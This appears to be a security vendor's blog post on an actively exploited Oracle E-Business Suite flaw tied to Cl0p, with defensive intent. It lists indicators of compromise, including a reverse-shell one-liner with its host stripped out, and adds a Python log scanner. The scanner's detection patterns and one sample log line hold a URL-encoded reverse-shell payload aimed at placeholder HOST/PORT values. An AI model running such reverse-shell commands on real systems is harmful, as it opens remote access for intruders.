Oracle has released an emergency security update to address a critical vulnerability in its E-Business Suite (EBS) software after confirming that threat actors associated with the Cl0p ransomware group exploited it in active data theft campaigns.
The flaw, tracked as CVE-2025-61882 with a CVSS score of 9.8, affects the Oracle Concurrent Processing component and allows for unauthenticated remote code execution. Attackers can exploit the vulnerability over HTTP without valid credentials, giving them full control of vulnerable systems.
In its advisory, Oracle stated:
“This vulnerability is remotely exploitable without authentication. If successfully exploited, it may result in remote code execution.”
Oracle’s Chief Security Officer, Rob Duhart, confirmed that the company issued the emergency patch after discovering additional avenues of exploitation during its investigation. The update is intended to prevent continued abuse of unpatched instances that remain exposed to the internet.
Active Exploitation and Indicators of Compromise
Indicators of compromise (IoCs) shared by Oracle point to activity linked to the Scattered LAPSUS$ Hunters group, which appears to be collaborating with Cl0p operators in this campaign. Notable IPs and artifacts include:
- 200.107.207[.]26 and 185.181.60[.]11 – observed in GET and POST request activity
- Reverse shell command: sh -c /bin/bash -i >& /dev/tcp// 0>&1
- Files associated with proof-of-concept exploit kits, including oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip and exp.py
These indicators suggest that the attackers not only leveraged zero-day vulnerabilities but also incorporated previously disclosed flaws from Oracle’s July 2025 Critical Patch Update into chained exploitation workflows.
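As an added example (not part of Oracle's advisory or the original article), the following Python script shows how a defender might sweep web server access logs for the indicators listed above: the two advisory IPs (with the defanging brackets removed), the proof-of-concept file names, and the structural fingerprint of the reverse-shell one-liner (the /dev/tcp/ redirection and interactive bash invocation), matched after URL-decoding so encoded payloads are not missed. The log format, the request paths and all sample log lines are constructed for illustration; the HOST/PORT values in the sample are placeholders, not the attacker infrastructure, which the article does not reproduce.

```python
import re
from urllib.parse import unquote

# Indicator IPs quoted from Oracle's advisory in the article, with the
# defanging brackets ("[.]") removed so they match raw log lines.
INDICATOR_IPS = {"200.107.207.26", "185.181.60.11"}

# File names from the article's IoC list.
INDICATOR_FILENAMES = {
    "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip",
    "exp.py",
}

# Structural fragments of the reverse-shell one-liner listed as an IoC.
# Matching on the /dev/tcp/ redirection and "bash -i >&" catches the
# pattern regardless of which host and port were used.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"bash\s+-i\s*>&"),
]

# Common Log Format (assumed here): client IP, ident, user, [timestamp],
# "METHOD path protocol", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def scan_line(line):
    """Return a list of (indicator_type, detail) hits for one access-log line."""
    hits = []
    m = LOG_RE.match(line)
    if not m:
        return hits  # unparseable line: nothing to match against
    ip = m.group("ip")
    # URL-decode so payloads sent as %2Fdev%2Ftcp are still recognised.
    path = unquote(m.group("path"))
    if ip in INDICATOR_IPS:
        hits.append(("indicator_ip", ip))
    for name in INDICATOR_FILENAMES:
        if name in path:
            hits.append(("indicator_filename", name))
    for pat in REVERSE_SHELL_PATTERNS:
        if pat.search(path):
            hits.append(("reverse_shell_pattern", pat.pattern))
            break  # one reverse-shell hit per line is enough
    return hits


def scan_log(lines):
    """Scan an iterable of log lines; return [(line_no, hits)] for lines with hits."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample log lines (not real traffic). Paths are hypothetical;
# HOST and PORT are placeholders, not an actual callback address.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Oct/2025:09:12:01 +0000] "GET /login HTTP/1.1" 200 5120',
    '200.107.207.26 - - [06/Oct/2025:09:12:44 +0000] "GET /login HTTP/1.1" 200 812',
    '185.181.60.11 - - [06/Oct/2025:09:13:02 +0000] "POST /servlet/sync HTTP/1.1" 200 31',
    '10.0.0.7 - - [06/Oct/2025:09:15:10 +0000] "GET /x?cmd=sh%20-c%20%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FHOST%2FPORT%200%3E%261 HTTP/1.1" 500 0',
    '10.0.0.9 - - [06/Oct/2025:09:15:55 +0000] "POST /upload/exp.py HTTP/1.1" 200 17',
    '10.0.0.8 - - [06/Oct/2025:09:16:30 +0000] "GET /help HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for line_no, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {hits}")
```

Run against real access logs, any hit on an indicator IP or the reverse-shell pattern should trigger the forensic review the article calls for rather than just a patch; the IP match alone is a weak signal (attacker infrastructure changes), while the decoded /dev/tcp/ fingerprint in a request is high-confidence regardless of source.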
Cl0p’s Campaign Expands
Mandiant, a Google Cloud subsidiary, reported that Cl0p operators have been conducting large-scale phishing campaigns targeting Oracle EBS customers since mid-August 2025. The campaign used hundreds of compromised accounts to distribute malicious payloads, with the goal of exfiltrating sensitive business and financial data.
Mandiant CTO Charles Carmakal noted that multiple Oracle EBS vulnerabilities were exploited in these incidents. “Cl0p exploited multiple vulnerabilities in Oracle EBS which enabled them to steal large amounts of data from several victims,” he said. “Given the broad zero-day exploitation that has already occurred, organizations should examine whether they were already compromised.”
Impact and Response
The incident underscores the growing sophistication of financially motivated groups such as Cl0p, which have moved beyond traditional ransomware encryption tactics toward data exfiltration and extortion. Their focus on high-value enterprise applications like Oracle EBS reflects a deliberate shift toward exploiting critical business infrastructure.
Oracle recommends immediate application of the new security update and urges organizations to audit network logs for any signs of compromise. Given the confirmed exploitation, applying the patch alone is not sufficient: organizations must also conduct forensic analysis to determine whether data theft or lateral movement has already occurred.
How Netizen Can Help
Netizen assists organizations in identifying, mitigating, and responding to zero-day exploitation through proactive threat intelligence, continuous monitoring, and incident response support. Our managed cybersecurity services include vulnerability scanning, patch verification, and forensic review to detect signs of exploitation in enterprise software like Oracle EBS.
With expertise across both government and commercial environments, Netizen’s 24x7x365 Security Operations Center (SOC) provides real-time visibility and rapid response to active threats. For organizations that suspect exposure to CVE-2025-61882 or similar vulnerabilities, Netizen’s team can help assess compromise indicators, harden systems, and implement long-term security measures to prevent recurrence.
Start the conversation today to secure your enterprise systems before the next critical vulnerability is exploited.
